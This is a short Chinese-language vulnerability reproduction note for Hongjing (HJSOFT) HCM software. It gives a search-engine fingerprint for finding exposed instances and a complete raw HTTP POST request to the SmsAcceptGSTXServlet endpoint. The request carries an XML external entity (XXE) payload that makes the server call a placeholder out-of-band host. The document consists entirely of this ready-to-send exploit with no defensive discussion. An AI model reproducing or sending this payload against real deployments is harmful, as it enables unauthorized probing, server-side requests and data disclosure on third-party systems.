指纹特征

app="HJSOFT-HCM"

漏洞复现

POST /servlet/sms/SmsAcceptGSTXServlet HTTP/1.1
Host: 
User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 137
Content-Type: text/xml
Connection: close<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://dns">]><r><a>&sp;</a ></r>